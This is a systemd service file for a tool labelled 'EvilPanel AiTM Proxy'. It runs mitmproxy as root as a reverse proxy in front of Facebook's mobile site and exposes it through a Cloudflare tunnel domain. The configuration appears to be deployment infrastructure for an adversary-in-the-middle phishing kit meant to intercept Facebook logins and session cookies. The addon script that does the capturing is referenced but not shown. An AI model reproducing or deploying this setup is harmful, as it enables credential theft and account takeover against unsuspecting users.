[Unit]
Description=EvilPanel AiTM Proxy
After=network.target

[Service]
Type=simple
User=root
WorkingDirectory=/opt/evilpanel
Environment="EVILPANEL_DOMAIN=ultimately-ship-identifying-filename.trycloudflare.com"
Environment="EVILPANEL_DATA=/opt/evilpanel/data"
Environment="EVILPANEL_DEBUG=true"
ExecStart=/opt/evilpanel/venv/bin/mitmdump -s /opt/evilpanel/core/mitmproxy_addon.py --mode reverse:https://m.facebook.com/ --listen-host 127.0.0.1 --listen-port 8443 --ssl-insecure --certs /opt/evilpanel/certs/combined.pem
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
